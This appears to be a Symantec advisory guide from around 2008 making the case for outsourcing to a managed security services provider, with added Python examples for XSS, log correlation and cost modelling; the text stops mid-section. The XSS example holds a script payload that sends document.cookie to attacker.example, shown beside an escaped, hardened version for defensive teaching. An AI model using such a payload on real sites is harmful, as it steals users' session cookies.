
Symantec Global Services

Confidence in a connected world.


Can Managing Enterprise Security Be
Made Easier?
A Symantec Advisory Guide
Who should read this guide:
CSOs, CISOs, managers, compliance officers, heads of security, CIOs, and
project managers faced with the challenge of managing enterprise security
Advice offered about:
Common hurdles when managing enterprise security in-house
Benefits of partnering with a Managed Security Service Provider (MSSP) for security protection
Sample expenses and cost comparison scenarios
Evaluating potential MSSPs
"We tried to provide this level of security on our own. We had two full-time employees looking at our own IDS sensors at one point. But trying to maintain signatures and updates, while continually inspecting and correlating events from the logs, was becoming quite a feat."
Network engineer
Considerations for Partnering with a Managed Security Services Provider for Security Protection

Contents

Introduction
  Considering the security management options
  Who should read this guide?
  What you will get from reading this guide
60-second insight: one minute to see how Symantec Managed Security Services can improve your security posture
The threat landscape continues to evolve
  Cyber-criminals continue to exploit trusted environments
  Rise in site-specific vulnerabilities
Common hurdles when managing enterprise security in-house
Measuring the cost of managing security in-house
  Equipment
    Hardware and software costs
    Maintenance
    Certifications and attestations
  Personnel
    Recruiting
    Training and education
  Security operations center
Benefits of managed security services
  Improve information protection
  Leverage knowledge and experience of security experts
  Stay abreast of the most recent security threats and attacks
  Share responsibility with a trusted security partner
  Consistent SLAs across the organization
  Gain reliable 24x7x365 security management
  Concentrate on what you do best
  Maximize investment on existing security products
  Make project and running costs more predictable
  Continuous improvement
Selecting a managed security services provider
  Breadth of supported technologies
  Security management processes
  Auditing
  Effectiveness of technology
  Reporting
  Security operations center capabilities
  Recommended MSSP checklist
Conclusion
Symantec Global Services
  Symantec Managed Security Services
  Symantec Residency Services
  Symantec Advisory Services
  Symantec DeepSight Early Warning Services
  Free 30-day trial service
  Symantec Managed Solutions
  To find out more
Introduction

Effective information security helps maintain the integrity of valuable corporate assets, enables compliance with industry regulations, and helps ensure the integrity of a trusted brand image and sustain business continuity. But providing an effective level of security requires a combination of state-of-the-art technology, experienced personnel, proven processes, and continuous threat intelligence that few organizations possess.

Those organizations that choose to tackle these critical issues in-house invariably find themselves struggling to identify security events, provide security event alerts, and respond to the threats. Specifically, the challenge is how to quickly identify which assets are at risk, determine the impact of security breaches, and prioritize incident response within the company. In order to make good decisions and protect information assets, companies must have the resources to understand what is happening both inside and outside the corporate network.

Security technologies, including firewalls, network and host intrusion detection, and prevention systems, have created a tremendous volume of information, and handling that information only makes a company's security problems more challenging. As a result, many organizations that currently manage security in-house are looking for alternatives. These organizations often find themselves choosing between two options: managing security in-house, or outsourcing either all or some security management to a managed security services provider (MSSP).

To ensure rapid response to real threats, MSSPs use high-availability security operations centers (SOCs) to provide outsourced management and monitoring of security devices and events. These centers support 24x7 services designed to reduce the number of operational security personnel an enterprise must hire, train, and retain in order to maintain an acceptable security posture.

Considering the security management options

It is essential that organizations weigh the risk of sharing their data with third parties against that of losing intellectual property and productivity as a result of malicious activity. Only robust, round-the-clock security management and monitoring can help mitigate the risk of threats against an enterprise network.

However, the wide range of MSSPs and their offerings can prove daunting to compare and understand. We commissioned this guide to help organizations weigh their security management options.

Grant Geyer
Vice President, Symantec Managed Security Services

"Without a sound security strategy, our organization would likely be out of business."
Director of technology
Who should read this guide?
CSOs, CISOs, managers, compliance officers, heads of security, CIOs, and project managers faced
with the challenge of managing enterprise security. This can include mail security; compliance; IT
risk; and the monitoring, identification, and remediation of security incidents and events.
What you will get from reading this guide
An understanding of the changing threat landscape and common hurdles you face when
managing enterprise security in-house
The benefits of partnering with an MSSP for security protection
Sample expenses and cost comparison scenarios to help you produce a financial analysis when
considering an MSSP
Useful guidance for evaluating potential MSSPs
60-second insight: one minute to see how Symantec Managed Security Services can improve your security posture
Benefit from extensive global threat intelligence
Symantec Managed Security Services has access to some of the most
comprehensive sources of Internet threat data in the world. Leveraging the
Symantec Global Intelligence Network, managed services teams are thoroughly
informed on world events, which accelerates the decision-making process to protect
your critical assets.
Avoid the impact of a missed security event.
Leverage security expertise for 24x7 monitoring, alerting on suspicious incidents,
and delivery of timely, prioritized remediation recommendations. Symantec
Managed Security Services security analysts and security operations center (SOC)
technology help keep your business assets safe from compromise.
Find the needle in the haystack
Symantec Managed Security Services technology and security analysts look for
small pieces of separate information in gigabytes of log files across multiple
devices, and then recognize which pieces, when put together, indicate a threat.
Symantec has built in-house technology to filter all customer information and
present events to analysts for further investigation.
Support for your audit requirements
Symantec Managed Security Services globally maintains the stringent audit requirements of ISO 27001 certification and a SAS 70 Type II audit report, and holds certifications for both business continuity planning and disaster recovery. Our mature approach to governance is designed to ensure that an incident or disaster in one region will not affect the support you receive or compromise the integrity of your business.
The threat landscape continues to evolve

On April 8, 2008, Symantec released Volume XIII of its Global Internet Security Threat Report (ISTR).

In the report, Symantec concludes that cyber-criminals are becoming increasingly professional, even commercial, in the development, distribution, and use of malicious code and services. While cyber-crime continues to be driven by financial gain, cyber-criminals are now using more professional attack methods, tools, and strategies to conduct malicious activity. Based on the data collected during the reporting period of July 1 to December 31, 2007, Symantec observed that the current security threat landscape is predominantly characterized by the following:

Malicious activity has become Web-based.
Attackers are targeting end users instead of computers.
The underground economy is becoming consolidated and mature.
Attackers and attack activity are adapting rapidly.

Cyber-criminals continue to exploit trusted environments

During the reporting period, Symantec observed that the majority of effective malicious activity has become Web-based: the Web is now the primary conduit for attack activity. This may be driven, in part, by the fact that compromises affecting computers on enterprise networks are likely to be discovered and shut down, whereas activity that takes place on end users' computers and on Web sites is less likely to be detected.

Symantec observed that 58% of all vulnerabilities disclosed during the period were in Web applications. Once a trusted Web site has been compromised, cyber-criminals use it as a distribution point for malicious programs in order to compromise the computers of the site's visitors. This attack method allows cyber-criminals to wait for their victims to come to them instead of needing to actively seek out targets.

Social networking Web sites are increasingly valuable to attackers because they provide access to a large number of people, many of whom trust the site and its security. These Web sites can also expose a great deal of confidential user information that can then be used in attempts at identity theft or online fraud.

An added benefit to attackers who target trusted sites is the ability to steal credentials or launch other attacks en masse, because these tactics allow attacks to propagate quickly through a victim's social network.

"It would be cost-prohibitive to try to cover this ground on our own."
Director of technology
Table 1. Personal information that can be used for financial gain is traded on underground economy servers. This table ranks the goods most frequently offered for sale.

Rank  Item                        Percentage  Range of prices
1     Bank accounts               22%         $0.40 – $20
2     Credit cards                13%         $10 – $1000
3     Full identities             9%          $1 – $15
4     Online auction accounts     7%          $1 – $8
5     Scams                       7%          $2.50/week – $50/week for hosting; $25 for design
6     Mailers                     6%          $1 – $10
7     Email addresses             5%          $0.83/MB – $10/MB
8     Email passwords             5%          $4 – $30
9     Drop (requests or offers)   5%          10% – 50% of total drop amount
10    Proxies                     5%          $1.50 – $30

"In the second half of 2007, 499,811 new malicious code threats were reported to Symantec, a 136% increase over the first half of 2007."

Rise in site-specific vulnerabilities

Site-specific vulnerabilities are perhaps the most telling indication of this trend. These are vulnerabilities that affect the custom or proprietary Web-application code of a specific Web site. During the last six months of 2007, 11,253 site-specific cross-site scripting vulnerabilities were documented. This is considerably higher than the 2,134 traditional vulnerabilities documented by Symantec during the same period.

These vulnerabilities are a concern because they allow attackers to compromise specific Web sites and then use those sites as a means of launching subsequent attacks against users, which has proved to be an effective strategy for multi-stage attacks that exploit client-side vulnerabilities.

Site-specific vulnerabilities are often used in combination with browser plug-in vulnerabilities, which are useful for conducting sophisticated Web-based attacks. Another indication of the Web's emergence as an attack vector is the continued growth in browser plug-in vulnerabilities. Browser plug-ins are technologies that run inside the Web browser and extend its features, such as those that allow additional multimedia content from Web pages to be rendered in the browser (ActiveX controls, for example). Plug-in vulnerabilities have remained popular because they are a very effective means of conducting Web-based attacks.
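The site-specific cross-site scripting bugs counted above live in a site's own application code, so there is no vendor patch to wait for; the fix is in the site's output handling. As an added illustration, written for this edit and not taken from Symantec or the ISTR, the following Python snippet shows a minimal search page that reflects the query parameter into HTML unencoded, beside the same page with contextual output encoding. The attacker hostname, the payload and the page layout are constructed for the example; only the standard library is used.

```python
import html
from urllib.parse import parse_qs, urlencode

# Constructed attacker input (hostname is a documentation placeholder):
# a script that ships the victim's cookie to the attacker via an image fetch.
XSS_PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
PROBE_QUERY = urlencode({"q": XSS_PAYLOAD})  # what a crafted link would carry


def search_term(query_string: str) -> str:
    """Extract the `q` parameter from a URL query string ("" if absent)."""
    return parse_qs(query_string, keep_blank_values=True).get("q", [""])[0]


def render_vulnerable(query_string: str) -> str:
    """Site-specific bug: the search term is concatenated into HTML as-is.
    A victim who follows a crafted link executes the attacker's script
    inside the trusted site's origin."""
    return f"<h1>Results for {search_term(query_string)}</h1>"


def render_hardened(query_string: str) -> str:
    """Same page with contextual output encoding: the payload is still shown,
    but as text, because <, >, & and quotes become HTML entities."""
    return f"<h1>Results for {html.escape(search_term(query_string), quote=True)}</h1>"


def reflects_script(page: str) -> bool:
    """The check a pentester would script: does a raw <script> tag survive?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        page = render(PROBE_QUERY)
        print(f"{name}: reflects script = {reflects_script(page)}\n  {page}")
```

The encoder has to match the context the data lands in: `html.escape` is correct for HTML body text, while attribute, URL and JavaScript contexts each need their own encoding. A Content-Security-Policy header that disallows inline script limits the damage when one output point is missed.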
Table 2. Symantec Internet Security Threat Reportdata sources
Figure 1. This chart shows malicious code trends. In the second half of 2007, 499,811 new
malicious code threats were reported to Symantec. This is a 136% increase over the first half of
2007.
Symantec uses multiple data sources to compile the Internet Security Threat Report, including:

More than 40,000 sensors that monitor network activity in more than 180 countries
Reports on malicious code, spyware, and adware from more than 120 million systems that have deployed Symantec virus protection products
A security vulnerability database spanning more than a decade that covers more than 25,000 vulnerabilities from more than 8,000 vendors
BugTraq, a forum for the disclosure and discussion of vulnerabilities, with approximately 50,000 direct subscribers
The Symantec Probe Network, a system of more than two million decoy accounts that attracts email messages from 30 different countries around the world, allowing Symantec to gauge global spam and phishing activity
[Figure 1 chart data, recovered from the extracted plot: bar chart with x-axis "Period" (half-years from Jul–Dec 2002 through Jul–Dec 2007) and y-axis "Number of new threats" (0 to 550,000). Bar values printed on the chart: 6,260; 8,475; 9,138; 20,451; 42,523; 48,226; 50,761; 53,410; 74,482; 212,101 (Jan–Jun 2007); 499,811 (Jul–Dec 2007).]
Common hurdles when managing enterprise security in-house

With customers and business partners dependent on accessing critical product and service data via open networks such as the Internet, organizations must ensure the integrity of this information or risk jeopardizing their reputation and their brand equity. In short, they need to protect the bottom line, the corporate image, and the brand.

Organizations face a number of barriers to achieving and maintaining effective security programs, including those listed in Table 3.

"Hiring more staff for a 24x7 immediate response team would have greatly increased our staffing costs."
Group leader

Table 3. Barriers to achieving and maintaining effective security programs
Security a core requirement, but not a core competence
Companies focusing on eCommerce and eBusiness must ensure that their information assets are properly protected. Managing information security requires constant vigilance and strict accountability for every change in the state of the network and the systems connected to it. Organizations often find they lack the in-house skills to manage this challenging task.

Need to find, hire, and retain security staff
Because of the strong market demand for skilled information security talent, organizations are finding it expensive to recruit, and extremely difficult to retain, these professionals. A large amount of time can be absorbed by the constant juggling of resources, resume sifting, interviews, contracts, and attrition. The high attrition rate among security personnel reduces a company's ability to safeguard its valuable information assets effectively.

Security staff overloaded with routine daily operations
While the security staff commit to the tasks, they often discover that they lack the time, expertise, and technical resources to provide effective, enterprise-wide monitoring and management on a 24x7x365 basis.

Need to develop a repeatable process for identifying and escalating security incidents
Determining what constitutes a security incident can be difficult. Traffic that looks benign to the untrained eye can be highly malicious when correlated with other security information. Developing a repeatable process that can be executed quickly and consistently is daunting for many organizations, especially when there is a low margin for error.

Security products generating vast amounts of difficult-to-manage data
To protect corporate information assets adequately on a 24x7x365 basis, and to identify and counteract security attacks in real time, information security staff must constantly analyze disparate data from various security devices, such as firewalls and intrusion detection systems (IDSs). Security staff can attempt to consolidate this data for viewing purposes, but most consolidation tools lack the ability to generate meaningful information. Symantec finds that 99.7% of the data produced by security devices is of little or no value in finding security incidents; moreover, such data is often laden with false positives. Finding the real security threats in this overwhelming volume of data can be like finding the proverbial needle in a haystack.

Growing volatility and sophistication of threats
The threat landscape has evolved away from large-scale pandemic threats toward quieter, more targeted attacks engineered to include multiple exploitation methods. These lower-profile, targeted attacks are engineered by cyber-criminals searching for new ways to steal information for financial gain. The attacks propagate more slowly to avoid detection and to increase the likelihood of successful compromise before security measures can be put in place. The new Internet threat reality is clear: fraudsters and hackers are working in concert for financial gain, and they are relying increasingly on the Internet.

Proactive intelligence
Setting up a security operations center in-house can be an expensive and cumbersome task, and many organizations that do so still are not aware of emerging Internet threats and vulnerabilities. Organizations that do not stay abreast of new threats are on their own on the Internet: they are left to react to new challenges instead of being proactively protected.

Cost-effective security protection on a 24x7 basis
Increased regulatory demands for business continuity, coupled with a push for availability of systems to clients and partners, are driving a requirement for cost-effective security protection on a 24x7x365 basis. The cost of building and staffing an SOC is daunting; it involves hiring 24x7x365 staff, implementing and tuning security information and event management (SIEM) technology, establishing processes, and managing the function. Furthermore, there is a high cost of entry just to have an in-house security management capability, regardless of the size of the security architecture being managed.
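The rows of Table 3 on repeatable incident identification and on the volume of device data describe what a correlation step has to do: discard the bulk of single-device noise and promote the few events that, taken together, indicate an attack. The following Python example, written for this edit and not taken from Symantec's SOC tooling, runs one such rule over constructed firewall, IDS and VPN log lines. A source address that trips more than one sensor inside a ten-minute window, or that logs in successfully after repeated failures, becomes an incident; everything else is left as background. The log formats, addresses, signature text and thresholds are assumptions chosen for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample logs (synthetic; simplified stand-ins for firewall, IDS
# and VPN syslog). Addresses come from the documentation ranges.
SAMPLE_LOGS = """\
2007-11-02T03:14:02 fw01 DENY src=203.0.113.7 dst=10.0.0.5 dport=22
2007-11-02T03:14:03 fw01 DENY src=203.0.113.7 dst=10.0.0.5 dport=23
2007-11-02T03:14:05 fw01 DENY src=198.51.100.9 dst=10.0.0.8 dport=445
2007-11-02T03:14:09 ids01 ALERT sig="SSH scan (constructed signature)" src=203.0.113.7 dst=10.0.0.5
2007-11-02T03:15:40 vpn01 LOGIN_FAIL user=jsmith src=203.0.113.7
2007-11-02T03:15:41 vpn01 LOGIN_FAIL user=jsmith src=203.0.113.7
2007-11-02T03:15:44 vpn01 LOGIN_OK user=jsmith src=203.0.113.7
2007-11-02T03:20:00 fw01 DENY src=192.0.2.44 dst=10.0.0.5 dport=80
2007-11-02T09:00:12 vpn01 LOGIN_FAIL user=amiller src=192.0.2.44
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<sensor>\S+) (?P<kind>\S+) ?(?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse(log_text):
    """Normalise each line into a dict with ts, sensor, kind and key=value fields."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than stall the pipeline
        fields = {k: v.strip('"') for k, v in KV_RE.findall(m["rest"])}
        events.append({"ts": datetime.fromisoformat(m["ts"]),
                       "sensor": m["sensor"], "kind": m["kind"], **fields})
    return events


def correlate(events, window=timedelta(minutes=10)):
    """One incident per source IP that, inside `window`, either trips two or
    more different sensors or shows a successful login after repeated failures."""
    by_src = defaultdict(list)
    for e in events:
        if "src" in e:
            by_src[e["src"]].append(e)

    incidents = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            cluster = [e for e in evs[i:] if e["ts"] - first["ts"] <= window]
            sensors = sorted({e["sensor"] for e in cluster})
            kinds = [e["kind"] for e in cluster]
            reasons = []
            if len(sensors) >= 2:
                reasons.append("multi-sensor")
            if "LOGIN_OK" in kinds and kinds[:kinds.index("LOGIN_OK")].count("LOGIN_FAIL") >= 2:
                reasons.append("login-after-failures")
            if reasons:
                incidents.append({"src": src, "start": first["ts"], "sensors": sensors,
                                  "events": len(cluster), "reasons": reasons})
                break  # report the earliest qualifying window for this source only
    return incidents


def noise_ratio(events, incidents):
    """Share of raw events that contributed to no incident at all."""
    flagged = {i["src"] for i in incidents}
    quiet = sum(1 for e in events if e.get("src") not in flagged)
    return quiet / len(events) if events else 0.0


if __name__ == "__main__":
    evs = parse(SAMPLE_LOGS)
    found = correlate(evs)
    for inc in found:
        print(inc)
    print(f"{noise_ratio(evs, found):.0%} of events were never part of an incident")
```

In the sample, 203.0.113.7 is promoted because firewall denies, an IDS alert and VPN login failures followed by a success all fall inside one window, while 192.0.2.44 is not, because its firewall deny and its later login failure are hours apart. The window size is what separates a real correlation from a coincidence, and it is the first parameter to tune against your own traffic.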
Measuring the cost of managing security in-house

To build, upgrade, maintain, operate, and control its security systems, any in-house security management program needs personnel and supporting hardware, software, and equipment. A full cost comparison, whether security is kept in-house or outsourced, also needs to account for the following variables:

All relevant capital and operating costs
Costs of supervising the MSSP (in the outsourced case)
Likely increases in costs for salaries, benefits, and service contracts
The cost of money and interest costs
Residual value of equipment and facilities
Cost of transition, including personnel
Cost of changes in direction and level of resources
Cost of contract modifications

To compute the total cost of ownership of in-house security management, companies need to identify and evaluate both overt and hidden costs over a number of years. The following sections list many of the costs of a security management program.

Equipment

Hardware and software costs

For in-house security management, companies must determine the cost of all hardware and software in addition to associated maintenance and support costs. This includes servers, PCs, and peripheral equipment, as well as all associated operating systems, databases, applications, and security software.

Additional hardware and software required to support security operations may include system and network management tools, fault management systems, help desk systems, and correlation technology.

While the software alone is expensive, to work effectively the organization will also need to integrate and customize it for its environment. These integration costs may be several times the cost of the software itself.

Maintenance

Maintenance fees for software and equipment must be factored into the total cost of ownership. Software maintenance is typically assessed annually at a rate of 15 to 25 percent of the cost of the software.

"If our network is down because of a security incident, or for any other reason, we calculate that our organization would lose a million dollars of revenue a day."
Director of technology
Certifications and attestations

To show the effectiveness of the security program, as well as to stay compliant with industry regulations, the environment will need to be audited. While many SOCs are becoming compliant with the ISO 17799 or ISO 27001 standard, they will also need to be included in Sarbanes-Oxley, MiFID, or Basel II audits. These certifications are difficult to obtain and require ongoing maintenance, but the real challenge is to develop all of the processes needed to run the operation on a day-to-day basis, and to ensure that it is effective and integrated within the overall information security and information technology program.

Personnel

Staffing for information security professionals is perhaps the most crucial, difficult, and costly component of an effective security management program.

While the salary of individual contributors may vary from $60,000 to $140,000 (averaging $85,000 to $90,000) based on experience and skill, salary is only part of the cost. After bonuses and stock incentives, space and equipment costs, and ongoing education and training benefits are added, the fully loaded figure may be over 50 percent higher.

The following scenario can aid in calculating the cost of expanding security operations from standard 8am-to-5pm coverage to full 24x7 coverage. To provide coverage 365 days per year, a company must staff multiple shifts:

Three sets of staff to cover three eight-hour shifts
One backup to provide time-off coverage for shifts 1, 2, and 3
One manager

Based on these assumptions, a company would need a minimum of five people to cover one seat in a 24x7 security operation, and these five would need expertise or specialization across a range of security issues. Treat five as a floor rather than a typical figure: three people on 40-hour weeks cover 120 of the 168 hours in a week, so the single relief position is absorbing weekend hours as well as leave, and covering 168 hours at 40 hours per person already requires 4.2 full-time equivalents before any vacation, sick time, or training is allowed for.

Recruiting

Given the high turnover rate in the IT field, organizations may also need to consider the cost of recruiting. Whether internal HR staff or external recruiters are used, the cost of recruiting may average 20 to 30 percent of the total annual compensation for the position being recruited.
"In each country where we have deployed managed security services, our company is saving on employing full-time equivalent (FTE) staff. Altogether, we have been able to re-allocate roles for 10 staff in EMEA, which is equivalent to a savings of almost $1.2 million every year."
European IT security head
Training and education

Security professionals require continuous training and education to hone their skills and, more importantly, to stay aware of the latest developments in an ever-changing, fast-paced technology environment.

Ongoing education should encompass the latest security tools and technologies, threat techniques, and best-practice protection strategies. Costs in this area may include:

Product or technology training
Training in general security awareness
Certification preparation classes
Certification costs
Attendance at major security conferences or shows
Books, magazine subscriptions, journals, or eLearning courses to help security professionals stay abreast of the latest technologies, tips, techniques, threats, and safeguards in the industry

Many organizations provide their personnel with two weeks of training each year, though more is often necessary. Most security courses are one week in duration, so each security employee would be able to attend two courses per year. Course fees may range from $1000 to $3000 each, and certification, conference attendance, and materials add to that, so a planning figure of $5000 per headcount per year for training is reasonable.
Security operations center

An SOC provides a secure work environment. Typically this area needs to be physically separated from the rest of the facility, requiring strong authentication to enter.

Most companies find it cost-prohibitive to build or lease an SOC because the cost can exceed $10 million (USD) in capital expenditures. Organizations also need to consider the need for power, HVAC, and fire suppression systems for their SOC. In addition, a disaster recovery plan, which would likely involve the build-out of a failover facility, should be taken into account.

By contrast, to build a full end-to-end SOC as a business, MSSPs invest between $25 million and $40 million (USD) in the required robust infrastructure, tools, and redundancy. Companies that choose to work with an MSSP benefit from these significant investments, as well as from the expertise of the security specialists to whom they entrust their operations.
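The cost sections above list their components one at a time but never combine them into a scenario. The following Python model, added for this edit and not part of Symantec's guide, pulls the guide's own planning figures together (five people per 24x7 seat, a salary midpoint of $87,500 loaded by 50 percent, recruiting at 25 percent of compensation, $5,000 of training per head, software maintenance at 20 percent per year) and sets a multi-year in-house total against an assumed flat MSSP fee. Staff turnover, the software licence cost, the integration multiplier and the MSSP fee are not stated in the guide and are marked as assumptions in the code.

```python
from dataclasses import dataclass


@dataclass
class InHouseAssumptions:
    """Annual USD figures unless noted. GUIDE = taken from the text above;
    ASSUMPTION = placeholder for this example, replace with your own numbers."""
    seats_24x7: int = 1                 # concurrently staffed analyst seats
    people_per_seat: int = 5            # GUIDE: 3 shifts + 1 relief + 1 manager
    base_salary: float = 87_500.0       # GUIDE: midpoint of the $85k-$90k average
    loading: float = 0.50               # GUIDE: bonuses, space, equipment, training benefits
    turnover: float = 0.20              # ASSUMPTION: share of staff replaced each year
    recruiting_rate: float = 0.25       # GUIDE: 20-30% of annual compensation per hire
    training_per_head: float = 5_000.0  # GUIDE
    software_capex: float = 500_000.0   # ASSUMPTION: SIEM/correlation licences, one-off
    maintenance_rate: float = 0.20      # GUIDE: 15-25% of software cost per year
    integration_multiplier: float = 2.0 # ASSUMPTION for "several times" the licence cost, one-off
    facility_capex: float = 0.0         # GUIDE: an SOC build can exceed $10M; 0 = reuse space


def in_house_costs(a: InHouseAssumptions, years: int) -> dict:
    """Break the in-house program into one-off and recurring parts and total it."""
    headcount = a.seats_24x7 * a.people_per_seat
    loaded_comp = a.base_salary * (1 + a.loading)
    recurring = {
        "compensation": headcount * loaded_comp,
        "recruiting": headcount * a.turnover * a.recruiting_rate * loaded_comp,
        "training": headcount * a.training_per_head,
        "maintenance": a.software_capex * a.maintenance_rate,
    }
    one_off = {
        "software": a.software_capex,
        "integration": a.software_capex * a.integration_multiplier,
        "facility": a.facility_capex,
    }
    annual = sum(recurring.values())
    return {"headcount": headcount, "one_off": one_off, "recurring": recurring,
            "annual_recurring": annual, "total": sum(one_off.values()) + annual * years}


def compare_with_mssp(a: InHouseAssumptions, mssp_annual_fee: float, years: int) -> dict:
    """Side-by-side totals over the planning horizon."""
    ih = in_house_costs(a, years)
    mssp_total = mssp_annual_fee * years
    return {"in_house_total": ih["total"], "mssp_total": mssp_total,
            "in_house_cheaper": ih["total"] < mssp_total}


def breakeven_year(a: InHouseAssumptions, mssp_annual_fee: float, max_years: int = 10):
    """First year in which cumulative in-house spend drops below cumulative MSSP
    spend, i.e. when the one-off outlay has been paid back; None if the MSSP
    stays cheaper for max_years (it always does when its fee is below the
    in-house annual recurring cost)."""
    ih = in_house_costs(a, 1)
    one_off = sum(ih["one_off"].values())
    for y in range(1, max_years + 1):
        if one_off + ih["annual_recurring"] * y < mssp_annual_fee * y:
            return y
    return None


if __name__ == "__main__":
    scenario = InHouseAssumptions()
    print(in_house_costs(scenario, years=3))
    # ASSUMPTION: flat annual MSSP fee for monitoring one seat's worth of devices
    print(compare_with_mssp(scenario, mssp_annual_fee=300_000.0, years=3))
    print("breakeven year vs $1.2M fee:", breakeven_year(scenario, 1_200_000.0))
```

With the defaults, one seat costs about $814,000 a year to run before any capital outlay, so an MSSP fee below that never reaches breakeven; the model is most useful for finding the fee at which the in-house option starts to pay back, and for seeing how sensitive that point is to the turnover and integration assumptions.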
Beyond pure cost, there are a number of advantages an organization receives from a
professionally managed service contract with a team of dedicated, experienced security
professionals.
Partnering with an experienced, well-established, and professional MSSP offers enhanced levels of
protection, 24x7x365 vigilance, a strengthened security posture, and a potential decrease in the
risk of cyber-threats.
Improve information protection
Providing security for todays networks and information systems is an increasingly complex
and critical endeavor, especially as hackers are using increasingly sophisticated methods and
technologies. Organizations whose core focus is not security are at a disadvantage in providing
a comprehensive, 24x7 security management program. The training, expertise, and diligence
required to stay abreast of the latest protection strategies is time-consuming for in-house staff
and distracts from other mission-critical activities.
Additionally, the vast amounts of data produced by firewalls and intrusion detection system
devices can quickly overwhelm an organization that lacks the sophisticated technology to help
its security staff with the daunting task of filtering through the data to find the real threats and
eliminate the false positives.
Leverage knowledge and experience of security experts
According to Gartner's April 2007 report MarketScope for Managed Security Services in Europe,
client discussions consistently identify the skilled resources of providers as one of the major
benefits of using MSSPs.
Organizations can take advantage of the expertise of MSSP security analysts and engineers who
manage and monitor security devices on a full-time basis. These analysts identify and respond
to thousands of security incidents and attacks every day. This means that, compared to an
organization's in-house security staff, they are more aware of potential threats and are more
knowledgeable about best practices for protecting critical data.
"The bottom line is that we can react in real-time to any security threats that take place, while keeping our security management costs in check."
Head of IT security
Stay abreast of the most recent security threats and attacks
An experienced MSSP maintains a research capability dedicated to staying abreast of the latest
cyber-threats, vulnerabilities, hacker techniques, and security developments. Constant monitoring
of security alerts and advisories is essential to providing maximum protection against security
threats.
Share responsibility with a trusted security partner
A MSSP acts as the company's security partner and shares the burden and the responsibility of
security management and incident response.
Consistent SLAs across the organization
MSSPs offer service-level agreements (SLAs) that define a contractual obligation to deliver
services in a particular manner and within a specific response-time window. The SLAs determine
the services the MSSP will provide and the performance targets they must achieve, and they
define exactly what will be delivered and when specific organizational requirements will be met.
Gain reliable 24x7x365 security management
A thorough MSSP will provide around-the-clock coverage for a client's most critical systems,
monitoring networks and infrastructures to ensure protection during the hours most hackers
attack. This vigilance, especially important in an always-on, always-connected business
environment, ensures that information assets are protected.
Concentrate on what you do best
Resource-constrained IT departments must support the company's core business and security
requirements. In an ideal world, talented in-house IT resources would be leveraged to plan
network redesigns and migrations in order to support strategic business initiatives, or to
implement new applications that focus on areas of greater return-on-investment (ROI) potential.
Many elements of security, such as compliance and antivirus, can be very labor-intensive
and subject to human error. Partnering with a MSSP removes the burden of constant device
monitoring and management. This enables organizations to direct in-house resources toward only
the most pressing security issues and vulnerabilities.
Maximize investment on existing security products
Many organizations purchase security products that, for a variety of reasons, are never fully
implemented. A high-quality MSSP ensures that purchased solutions are installed, implemented,
and integrated to provide the ongoing value an organization needs and expects.
Make project and running costs more predictable
By partnering with a MSSP to protect critical information assets, organizations can avoid the
extensive personnel costs associated with hiring, training, and retaining security professionals.
Managed security services reduce total cost of ownership by delivering predictable monthly costs
for security coverage. Because managed services are billed on a monthly basis, organizations are
also better able to predict and manage their security-related budgets.
Continuous improvement
By tapping into the expertise of a company comprised of literally thousands of security experts
working in the field every day, you will always be at the forefront of security knowledge and
expertise.
Selecting a managed security services provider
Determining the cost of partnering with a managed security services provider is only one, limited
criterion in the overall evaluation of MSSPs. Organizations should also consider the following key
factors:
Longevity: Consider partnering with a stable vendor that has a proven track record of
delivering quality services to a large number of clients over a long period of time. These are the
MSSPs most likely to weather economic downturns or industry shakeouts.
Annual revenues: For publicly traded companies, according to Gartner, annual run rates of
more than $10 million per year in managed security services contracts indicate a sufficient
base of revenue to support growth and enhancement of services.
Management experience: A successful MSSP selects its security experts from a range
of backgrounds, including the military, government, and industrial sectors. Appropriate
management experience is usually represented as well, from a variety of related services such
as online, financial, and service bureaus.
Range and flexibility of the services: The range of services offered indicates the MSSP's
ability to meet the evolving security management needs of a wide variety of organizations. Leading
MSSPs will offer a complete set of managed and consulting security services, either organically
or through partnerships. Services should include managed mail security; managed firewall;
managed intrusion detection system; threat and vulnerability management; security intelligence
services; and monitoring, remediation, and reporting tools. Ideally, the MSSP will offer multiple
levels and types of services, as well as customized services to meet the unique organizational
requirements of each client.
Breadth of supported technologies
Evaluating a MSSP on its ability to provide broad support for multiple technologies is essential
to ensuring a smooth and effective managed security program. Some MSSPs will only manage
certain security technologies; others will provide comprehensive multivendor support.
Security management processes
A MSSP should be able to provide documented standards and policies for handling both typical
and atypical operations and threats. It should also offer a variety of attack alert notification
methods to give the client's security staff the ability to mitigate risk in real time. A MSSP should
facilitate the incident response phase, integrating the capabilities of the client incident response
team (IRT) with the MSSP alerting process. This requires a pre-defined and shared incident
response roadmap.
1. Gartner RAS Core Research Note G00149649, Kelly M. Kavanagh, John Pescatore, 1 August 2007 RA4 8/4/2008. The Magic Quadrant is copyrighted 2006 by Gartner, Inc. and is reused with permission. The Magic Quadrant is a graphical representation of a marketplace at and for a specific time period. It depicts Gartner's analysis of how certain vendors measure against criteria for that marketplace, as defined by Gartner. Gartner does not endorse any vendor, product, or service depicted in the Magic Quadrant, and does not advise technology users to select only those vendors placed in the "Leaders" quadrant. The Magic Quadrant is intended solely as a research tool, and is not meant to be a specific guide to action. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
"The managed security service (MSS) market in North America generated revenue of approximately $500 million in 2006, and Gartner estimates that revenue will grow about 19% in 2007."
Gartner, Magic Quadrant for MSSPs, North America, 1H07 [1]
Auditing
Companies are being held to a higher standard of accountability with respect to audit
requirements. As an extension of the organization, a MSSP must have facilities, processes, and
procedures that are validated and certified by a third-party auditor in the form of an ISO27001
and/or SAS70 Type II audit.
Effectiveness of technology
The technology used to analyze and correlate data collected from multiple devices should support
rapid response while ensuring the scalability to support an ever-increasing number of managed
devices. So that clients can focus their security staff on the most critical issues, the technology
should be supported by security analysts who can separate real threats from false ones.
Reporting
Reporting can provide an enterprise-wide, real-time view into the client's security posture and
